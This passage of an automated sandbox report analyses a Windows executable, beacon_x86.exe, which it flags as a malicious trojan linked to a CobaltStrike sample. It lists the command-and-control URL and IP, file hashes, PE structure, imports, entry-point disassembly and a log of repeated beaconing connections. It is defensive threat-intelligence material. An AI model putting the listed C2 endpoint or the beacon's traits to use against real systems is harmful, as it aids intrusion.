        http://8.148.6.140/api/v1/get.0%Avira URL Cloudsafe
        http://8.148.6.140/api/v1/getP0%Avira URL Cloudsafe
        http://8.148.6.140/api/v1/getoft0%Avira URL Cloudsafe
        8.148.6.1400%Avira URL Cloudsafe
        http://8.148.6.140/api/v1/get0%Avira URL Cloudsafe
        http://8.148.6.140/api/v1/getF0%Avira URL Cloudsafe
        No contacted domains info
        NameMaliciousAntivirus DetectionReputation
        8.148.6.140true
        • Avira URL Cloud: safe
        unknown
        http://8.148.6.140/api/v1/gettrue
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://8.148.6.140/api/v1/getBasebeacon_x86.exe, 00000000.00000002.3890371046.0000000000753000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://8.148.6.140/api/v1/get4beacon_x86.exe, 00000000.00000002.3890371046.0000000000753000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://8.148.6.140/api/v1/get2beacon_x86.exe, 00000000.00000002.3890371046.0000000000753000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://8.148.6.140/api/v1/getwshqos.dll.muibeacon_x86.exe, 00000000.00000002.3890371046.0000000000753000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://8.148.6.140/api/v1/getybeacon_x86.exe, 00000000.00000002.3890371046.0000000000753000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://8.148.6.140/api/v1/getLbeacon_x86.exe, 00000000.00000002.3890371046.0000000000753000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://8.148.6.140/api/v1/getKbeacon_x86.exe, 00000000.00000002.3890371046.0000000000753000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://8.148.6.140/api/v1/getPbeacon_x86.exe, 00000000.00000002.3890371046.0000000000753000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://8.148.6.140/api/v1/get1beacon_x86.exe, 00000000.00000002.3890371046.0000000000753000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://8.148.6.140/api/v1/get.beacon_x86.exe, 00000000.00000002.3890371046.0000000000753000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://8.148.6.140/api/v1/getoftbeacon_x86.exe, 00000000.00000002.3890371046.0000000000753000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://8.148.6.140/api/v1/getFbeacon_x86.exe, 00000000.00000002.3890371046.0000000000753000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        8.148.6.140
        unknownSingapore
        37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
        Joe Sandbox version:42.0.0 Malachite
        Analysis ID:1587368
        Start date and time:2025-01-10 09:32:22 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 5m 0s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Run name:Run with higher sleep bypass
        Number of analysed new started processes analysed:4
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:beacon_x86.exe
        Detection:MAL
        Classification:mal92.troj.winEXE@1/0@0/1
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 34
        • Number of non-executed functions: 90
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
        • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
        • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
        • Report size getting too big, too many NtQueryValueKey calls found.
        No simulations
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        8.148.6.140beacon_x64.exeGet hashmaliciousCobaltStrikeBrowse
        • 8.148.6.140/api/v1/get
        No context
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdbeacon_x64.exeGet hashmaliciousCobaltStrikeBrowse
        • 8.148.6.140
        2873466535874-68348745.02.exeGet hashmaliciousUnknownBrowse
        • 118.178.60.103
        armv5l.elfGet hashmaliciousUnknownBrowse
        • 47.116.93.193
        3.elfGet hashmaliciousUnknownBrowse
        • 47.113.16.150
        armv7l.elfGet hashmaliciousUnknownBrowse
        • 8.181.124.11
        THsSNYblMw.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
        • 47.121.190.121
        Fantazy.sh4.elfGet hashmaliciousUnknownBrowse
        • 139.242.78.130
        Fantazy.ppc.elfGet hashmaliciousUnknownBrowse
        • 47.114.96.229
        Fantazy.mips.elfGet hashmaliciousUnknownBrowse
        • 8.140.140.254
        No context
        No context
        No created / dropped files found
        File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
        Entropy (8bit):6.777438348295706
        TrID:
        • Win32 Executable (generic) a (10002005/4) 99.96%
        • Generic Win/DOS Executable (2004/3) 0.02%
        • DOS Executable Generic (2002/1) 0.02%
        • VXD Driver (31/22) 0.00%
        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
        File name:beacon_x86.exe
        File size:324'096 bytes
        MD5:bffe5dbe4d4ececc6652360ce37b8075
        SHA1:9e3ccfe33a88fd70ba6b5ac8f72b3bc0c760e798
        SHA256:c86426eeb24a042903b302c21513defb1e61535fc008b7c9e847113ddb798666
        SHA512:a57a54cdc9411288b0058d90bd942c8954c40e184be11e8d4296355466f466bba111d845a3b906835f3755e204e7d7fe0977b9da989ea2050040654fa66019d3
        SSDEEP:6144:E1Qdv/pgihi5cFPr8OstxsUvuTHNPbNKuXjlM6SKj:Wi/pgOYXOtpHNPbNlXjqe
        TLSH:0864CF6FA432C8E7C8FD71F01AC763AFA5AE127C5885CA7AD74EF094F421B045E84592
        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......................".....................0....@..........................@................ ............................
        Icon Hash:00928e8e8686b000
        Entrypoint:0x4014a0
        Entrypoint Section:.text
        Digitally signed:false
        Imagebase:0x400000
        Subsystem:windows gui
        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
        DLL Characteristics:
        Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
        TLS Callbacks:0x401b40, 0x401af0
        CLR (.Net) Version:
        OS Version Major:4
        OS Version Minor:0
        File Version Major:4
        File Version Minor:0
        Subsystem Version Major:4
        Subsystem Version Minor:0
        Import Hash:f6243a15fa8eee8ee96b5e1144d461f6
        Instruction
        sub esp, 0Ch
        mov dword ptr [00450394h], 00000001h
        call 00007F195CE92263h
        add esp, 0Ch
        jmp 00007F195CE91A1Bh
        lea esi, dword ptr [esi+00000000h]
        sub esp, 0Ch
        mov dword ptr [00450394h], 00000000h
        call 00007F195CE92243h
        add esp, 0Ch
        jmp 00007F195CE919FBh
        lea esi, dword ptr [esi+00000000h]
        sub esp, 1Ch
        mov eax, dword ptr [esp+20h]
        mov dword ptr [esp], eax
        call 00007F195CE931EAh
        test eax, eax
        sete al
        add esp, 1Ch
        movzx eax, al
        neg eax
        ret
        nop
        nop
        nop
        push ebp
        mov ebp, esp
        sub esp, 18h
        mov dword ptr [esp], 00401520h
        call 00007F195CE91D43h
        leave
        ret
        lea esi, dword ptr [esi+00000000h]
        lea esi, dword ptr [esi+00h]
        nop
        ret
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        push ebp
        mov ebp, esp
        mov eax, dword ptr [ebp+08h]
        pop ebp
        jmp eax
        push ebp
        mov edx, dword ptr [0040302Ch]
        mov ebp, esp
        mov eax, dword ptr [ebp+08h]
        test edx, edx
        jle 00007F195CE91D93h
        cmp dword ptr [00403030h], 00000000h
        jle 00007F195CE91D8Ah
        mov ecx, dword ptr [00451148h]
        mov dword ptr [eax+edx], ecx
        mov ecx, dword ptr [0045114Ch]
        mov edx, dword ptr [00403030h]
        NameVirtual AddressVirtual Size Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IMPORT0x510000x644.idata
        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
        IMAGE_DIRECTORY_ENTRY_TLS0x4f0300x18.rdata
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IAT0x5111c0xe0.idata
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
        .text0x10000x1a440x1c0078084e5ca85835392a463f62abd5746cFalse0.5334821428571429data5.700340700341032IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        .data0x30000x4bc6c0x4be00d09fab49fa7c820bc22a7bf525cb270cFalse0.5702063169275123dBase III DBT, version number 0, next free block index 10, 1st item "\340\334\253\212\344\334+\223\344\334+\223\344\334+\223\344\334+\223\344\334+\223\344\334+\223\344\334+\223\344\334+\223\344\334+\223\344\334+\223\344\334+\223\344\334+\223\344\334+#\346\334\017\220\344\334+\223\344\334+\223\344\334+\223\344\334+\223\344\334+\223\344\334+\223\344\334\037\313\210\227E\277\344\334\376\002\346\334+\203\344\334+\001\346\334+\227\344\334+\223\344\334+\223\344\334+\223\344\334\013\223\344\274\037"6.802458719813997IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .rdata0x4f0000x6340x800667441c840a2c3ea7e1291acd47bf4c5False0.2275390625data4.495993508967327IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
        .bss0x500000x4280x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .idata0x510000x6440x8007d72908e4c68f22d444c4e664d88dda3False0.3544921875data4.2935353496828945IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .CRT0x520000x340x200a09a5f5fb4593e99cd0076e5f2fcec2eFalse0.072265625Matlab v4 mat-file (little endian) \200\031@, numeric, rows 4198688, columns 00.2711142780062829IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .tls0x530000x80x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        DLLImport
        KERNEL32.dllCloseHandle, ConnectNamedPipe, CreateFileA, CreateNamedPipeA, CreateThread, DeleteCriticalSection, EnterCriticalSection, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetLastError, GetModuleHandleA, GetProcAddress, GetStartupInfoA, GetSystemTimeAsFileTime, GetTickCount, InitializeCriticalSection, LeaveCriticalSection, QueryPerformanceCounter, ReadFile, SetUnhandledExceptionFilter, Sleep, TerminateProcess, TlsGetValue, UnhandledExceptionFilter, VirtualAlloc, VirtualProtect, VirtualQuery, WriteFile
        msvcrt.dll__getmainargs, __initenv, __lconv_init, __p__acmdln, __p__fmode, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _initterm, _iob, _onexit, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, signal, sprintf, strlen, strncmp, vfprintf
        TimestampSource PortDest PortSource IPDest IP
        Jan 10, 2025 09:33:14.741468906 CET4970480192.168.2.58.148.6.140
        Jan 10, 2025 09:33:14.746558905 CET80497048.148.6.140192.168.2.5
        Jan 10, 2025 09:33:14.746654034 CET4970480192.168.2.58.148.6.140
        Jan 10, 2025 09:33:14.746783972 CET4970480192.168.2.58.148.6.140
        Jan 10, 2025 09:33:14.751660109 CET80497048.148.6.140192.168.2.5
        Jan 10, 2025 09:33:15.723031998 CET80497048.148.6.140192.168.2.5
        Jan 10, 2025 09:33:15.723054886 CET80497048.148.6.140192.168.2.5
        Jan 10, 2025 09:33:15.723104000 CET4970480192.168.2.58.148.6.140
        Jan 10, 2025 09:33:15.723151922 CET4970480192.168.2.58.148.6.140
        Jan 10, 2025 09:33:15.724241972 CET4970480192.168.2.58.148.6.140
        Jan 10, 2025 09:33:15.729049921 CET80497048.148.6.140192.168.2.5
        Jan 10, 2025 09:33:27.197143078 CET4970580192.168.2.58.148.6.140
        Jan 10, 2025 09:33:27.202027082 CET80497058.148.6.140192.168.2.5
        Jan 10, 2025 09:33:27.202100039 CET4970580192.168.2.58.148.6.140
        Jan 10, 2025 09:33:27.206543922 CET4970580192.168.2.58.148.6.140
        Jan 10, 2025 09:33:27.211359978 CET80497058.148.6.140192.168.2.5
        Jan 10, 2025 09:33:28.167161942 CET80497058.148.6.140192.168.2.5
        Jan 10, 2025 09:33:28.167187929 CET80497058.148.6.140192.168.2.5
        Jan 10, 2025 09:33:28.167346954 CET4970580192.168.2.58.148.6.140
        Jan 10, 2025 09:33:28.167346954 CET4970580192.168.2.58.148.6.140
        Jan 10, 2025 09:33:28.167457104 CET4970580192.168.2.58.148.6.140
        Jan 10, 2025 09:33:28.172367096 CET80497058.148.6.140192.168.2.5
        Jan 10, 2025 09:33:43.110169888 CET4978680192.168.2.58.148.6.140
        Jan 10, 2025 09:33:43.116633892 CET80497868.148.6.140192.168.2.5
        Jan 10, 2025 09:33:43.116796017 CET4978680192.168.2.58.148.6.140
        Jan 10, 2025 09:33:43.116868973 CET4978680192.168.2.58.148.6.140
        Jan 10, 2025 09:33:43.121926069 CET80497868.148.6.140192.168.2.5
        Jan 10, 2025 09:33:53.089167118 CET80497868.148.6.140192.168.2.5
        Jan 10, 2025 09:33:53.089258909 CET4978680192.168.2.58.148.6.140
        Jan 10, 2025 09:33:53.089340925 CET80497868.148.6.140192.168.2.5
        Jan 10, 2025 09:33:53.089356899 CET80497868.148.6.140192.168.2.5
        Jan 10, 2025 09:33:53.089538097 CET4978680192.168.2.58.148.6.140
        Jan 10, 2025 09:33:53.089538097 CET4978680192.168.2.58.148.6.140
        Jan 10, 2025 09:33:53.089554071 CET4978680192.168.2.58.148.6.140
        Jan 10, 2025 09:33:53.094350100 CET80497868.148.6.140192.168.2.5
        Jan 10, 2025 09:34:01.532318115 CET4990280192.168.2.58.148.6.140
        Jan 10, 2025 09:34:01.538027048 CET80499028.148.6.140192.168.2.5
        Jan 10, 2025 09:34:01.538142920 CET4990280192.168.2.58.148.6.140
        Jan 10, 2025 09:34:01.538283110 CET4990280192.168.2.58.148.6.140
        Jan 10, 2025 09:34:01.545789003 CET80499028.148.6.140192.168.2.5
        Jan 10, 2025 09:34:02.534269094 CET80499028.148.6.140192.168.2.5
        Jan 10, 2025 09:34:02.534312963 CET80499028.148.6.140192.168.2.5
        Jan 10, 2025 09:34:02.534363031 CET4990280192.168.2.58.148.6.140
        Jan 10, 2025 09:34:02.534420967 CET4990280192.168.2.58.148.6.140
        Jan 10, 2025 09:34:02.535289049 CET4990280192.168.2.58.148.6.140
        Jan 10, 2025 09:34:02.540169954 CET80499028.148.6.140192.168.2.5
        Jan 10, 2025 09:34:13.596132994 CET4997980192.168.2.58.148.6.140
        Jan 10, 2025 09:34:13.603368998 CET80499798.148.6.140192.168.2.5
        Jan 10, 2025 09:34:13.603471041 CET4997980192.168.2.58.148.6.140
        Jan 10, 2025 09:34:13.603579998 CET4997980192.168.2.58.148.6.140
        Jan 10, 2025 09:34:13.610373020 CET80499798.148.6.140192.168.2.5
        Jan 10, 2025 09:34:14.582881927 CET80499798.148.6.140192.168.2.5
        Jan 10, 2025 09:34:14.582906008 CET80499798.148.6.140192.168.2.5
        Jan 10, 2025 09:34:14.582984924 CET4997980192.168.2.58.148.6.140
        Jan 10, 2025 09:34:14.583014011 CET4997980192.168.2.58.148.6.140
        Jan 10, 2025 09:34:14.583213091 CET4997980192.168.2.58.148.6.140
        Jan 10, 2025 09:34:14.588042021 CET80499798.148.6.140192.168.2.5
        Jan 10, 2025 09:34:28.875695944 CET4998080192.168.2.58.148.6.140
        Jan 10, 2025 09:34:28.880768061 CET80499808.148.6.140192.168.2.5
        Jan 10, 2025 09:34:28.880867958 CET4998080192.168.2.58.148.6.140
        Jan 10, 2025 09:34:28.881055117 CET4998080192.168.2.58.148.6.140
        Jan 10, 2025 09:34:28.885910034 CET80499808.148.6.140192.168.2.5
        Jan 10, 2025 09:34:29.857074976 CET80499808.148.6.140192.168.2.5
        Jan 10, 2025 09:34:29.857170105 CET80499808.148.6.140192.168.2.5
        Jan 10, 2025 09:34:29.857207060 CET80499808.148.6.140192.168.2.5
        Jan 10, 2025 09:34:29.857393980 CET4998080192.168.2.58.148.6.140
        Jan 10, 2025 09:34:29.857394934 CET4998080192.168.2.58.148.6.140
        Jan 10, 2025 09:34:29.857583046 CET4998080192.168.2.58.148.6.140
        Jan 10, 2025 09:34:29.862680912 CET80499808.148.6.140192.168.2.5
        Jan 10, 2025 09:34:41.532005072 CET4998280192.168.2.58.148.6.140
        Jan 10, 2025 09:34:41.537147999 CET80499828.148.6.140192.168.2.5
        Jan 10, 2025 09:34:41.537275076 CET4998280192.168.2.58.148.6.140
        Jan 10, 2025 09:34:41.537434101 CET4998280192.168.2.58.148.6.140
        Jan 10, 2025 09:34:41.542279959 CET80499828.148.6.140192.168.2.5
        Jan 10, 2025 09:34:42.526767969 CET80499828.148.6.140192.168.2.5
        Jan 10, 2025 09:34:42.526854038 CET4998280192.168.2.58.148.6.140
        Jan 10, 2025 09:34:42.526874065 CET80499828.148.6.140192.168.2.5
        Jan 10, 2025 09:34:42.526918888 CET4998280192.168.2.58.148.6.140
        Jan 10, 2025 09:34:42.529597998 CET4998280192.168.2.58.148.6.140
        Jan 10, 2025 09:34:42.534514904 CET80499828.148.6.140192.168.2.5
        Jan 10, 2025 09:34:56.219410896 CET4998380192.168.2.58.148.6.140
        Jan 10, 2025 09:34:56.224865913 CET80499838.148.6.140192.168.2.5
        Jan 10, 2025 09:34:56.224965096 CET4998380192.168.2.58.148.6.140
        Jan 10, 2025 09:34:56.225063086 CET4998380192.168.2.58.148.6.140
        Jan 10, 2025 09:34:56.229918003 CET80499838.148.6.140192.168.2.5
        Jan 10, 2025 09:34:57.190067053 CET80499838.148.6.140192.168.2.5
        Jan 10, 2025 09:34:57.190176964 CET80499838.148.6.140192.168.2.5
        Jan 10, 2025 09:34:57.190387011 CET4998380192.168.2.58.148.6.140
        Jan 10, 2025 09:34:57.190387011 CET4998380192.168.2.58.148.6.140
        Jan 10, 2025 09:34:57.190491915 CET4998380192.168.2.58.148.6.140
        Jan 10, 2025 09:34:57.195509911 CET80499838.148.6.140192.168.2.5
        Jan 10, 2025 09:35:07.953865051 CET4998480192.168.2.58.148.6.140
        Jan 10, 2025 09:35:07.959166050 CET80499848.148.6.140192.168.2.5
        Jan 10, 2025 09:35:07.959280014 CET4998480192.168.2.58.148.6.140
        Jan 10, 2025 09:35:07.959367037 CET4998480192.168.2.58.148.6.140
        Jan 10, 2025 09:35:07.964194059 CET80499848.148.6.140192.168.2.5
        Jan 10, 2025 09:35:08.935903072 CET80499848.148.6.140192.168.2.5
        Jan 10, 2025 09:35:08.935966015 CET80499848.148.6.140192.168.2.5
        Jan 10, 2025 09:35:08.936000109 CET80499848.148.6.140192.168.2.5
        Jan 10, 2025 09:35:08.936041117 CET4998480192.168.2.58.148.6.140
        Jan 10, 2025 09:35:08.936042070 CET4998480192.168.2.58.148.6.140
        Jan 10, 2025 09:35:08.936131954 CET4998480192.168.2.58.148.6.140
        Jan 10, 2025 09:35:08.936280966 CET4998480192.168.2.58.148.6.140
        Jan 10, 2025 09:35:08.941191912 CET80499848.148.6.140192.168.2.5
        Jan 10, 2025 09:35:23.510116100 CET4998580192.168.2.58.148.6.140
        Jan 10, 2025 09:35:23.515228987 CET80499858.148.6.140192.168.2.5
        Jan 10, 2025 09:35:23.515315056 CET4998580192.168.2.58.148.6.140
        Jan 10, 2025 09:35:23.515551090 CET4998580192.168.2.58.148.6.140
        Jan 10, 2025 09:35:23.521147013 CET80499858.148.6.140192.168.2.5
        Jan 10, 2025 09:35:24.504993916 CET80499858.148.6.140192.168.2.5
        Jan 10, 2025 09:35:24.505153894 CET80499858.148.6.140192.168.2.5
        Jan 10, 2025 09:35:24.505187988 CET4998580192.168.2.58.148.6.140
        Jan 10, 2025 09:35:24.505289078 CET4998580192.168.2.58.148.6.140
        Jan 10, 2025 09:35:37.859551907 CET4998580192.168.2.58.148.6.140
        Jan 10, 2025 09:35:37.859925032 CET4998680192.168.2.58.148.6.140
        Jan 10, 2025 09:35:37.864607096 CET80499858.148.6.140192.168.2.5
        Jan 10, 2025 09:35:37.864943027 CET80499868.148.6.140192.168.2.5
        Jan 10, 2025 09:35:37.865081072 CET4998680192.168.2.58.148.6.140
        Jan 10, 2025 09:35:37.865269899 CET4998680192.168.2.58.148.6.140
        Jan 10, 2025 09:35:37.870114088 CET80499868.148.6.140192.168.2.5
        Jan 10, 2025 09:35:39.461031914 CET80499868.148.6.140192.168.2.5
        Jan 10, 2025 09:35:39.461090088 CET80499868.148.6.140192.168.2.5
        Jan 10, 2025 09:35:39.461198092 CET4998680192.168.2.58.148.6.140
        Jan 10, 2025 09:35:39.461424112 CET4998680192.168.2.58.148.6.140
        Jan 10, 2025 09:35:39.466249943 CET80499868.148.6.140192.168.2.5
        Jan 10, 2025 09:35:53.344727993 CET4998780192.168.2.58.148.6.140
        Jan 10, 2025 09:35:53.349769115 CET80499878.148.6.140192.168.2.5
        Jan 10, 2025 09:35:53.349895954 CET4998780192.168.2.58.148.6.140
        Jan 10, 2025 09:35:53.350166082 CET4998780192.168.2.58.148.6.140
        Jan 10, 2025 09:35:53.354962111 CET80499878.148.6.140192.168.2.5
        Jan 10, 2025 09:35:54.346221924 CET80499878.148.6.140192.168.2.5
        Jan 10, 2025 09:35:54.346281052 CET80499878.148.6.140192.168.2.5
        Jan 10, 2025 09:35:54.346582890 CET4998780192.168.2.58.148.6.140
        Jan 10, 2025 09:35:54.346582890 CET4998780192.168.2.58.148.6.140
        Jan 10, 2025 09:35:54.346729040 CET4998780192.168.2.58.148.6.140
        Jan 10, 2025 09:35:54.351588011 CET80499878.148.6.140192.168.2.5
        Jan 10, 2025 09:36:08.906637907 CET4998880192.168.2.58.148.6.140
        Jan 10, 2025 09:36:08.911773920 CET80499888.148.6.140192.168.2.5
        Jan 10, 2025 09:36:08.911864042 CET4998880192.168.2.58.148.6.140
        Jan 10, 2025 09:36:08.911976099 CET4998880192.168.2.58.148.6.140
        Jan 10, 2025 09:36:08.916862965 CET80499888.148.6.140192.168.2.5
        Jan 10, 2025 09:36:09.860977888 CET80499888.148.6.140192.168.2.5
        Jan 10, 2025 09:36:09.861033916 CET80499888.148.6.140192.168.2.5
        Jan 10, 2025 09:36:09.861068010 CET4998880192.168.2.58.148.6.140
        Jan 10, 2025 09:36:09.861093044 CET4998880192.168.2.58.148.6.140
        Jan 10, 2025 09:36:09.861226082 CET4998880192.168.2.58.148.6.140
        Jan 10, 2025 09:36:09.866003990 CET80499888.148.6.140192.168.2.5
        Jan 10, 2025 09:36:18.563385963 CET4998980192.168.2.58.148.6.140
        Jan 10, 2025 09:36:18.568629026 CET80499898.148.6.140192.168.2.5
        Jan 10, 2025 09:36:18.568744898 CET4998980192.168.2.58.148.6.140
        Jan 10, 2025 09:36:18.569010973 CET4998980192.168.2.58.148.6.140
        Jan 10, 2025 09:36:18.573852062 CET80499898.148.6.140192.168.2.5
        Jan 10, 2025 09:36:19.533714056 CET80499898.148.6.140192.168.2.5
        Jan 10, 2025 09:36:19.533763885 CET80499898.148.6.140192.168.2.5
        Jan 10, 2025 09:36:19.533796072 CET80499898.148.6.140192.168.2.5
        Jan 10, 2025 09:36:19.533793926 CET4998980192.168.2.58.148.6.140
        Jan 10, 2025 09:36:19.533884048 CET4998980192.168.2.58.148.6.140
        Jan 10, 2025 09:36:19.533884048 CET4998980192.168.2.58.148.6.140
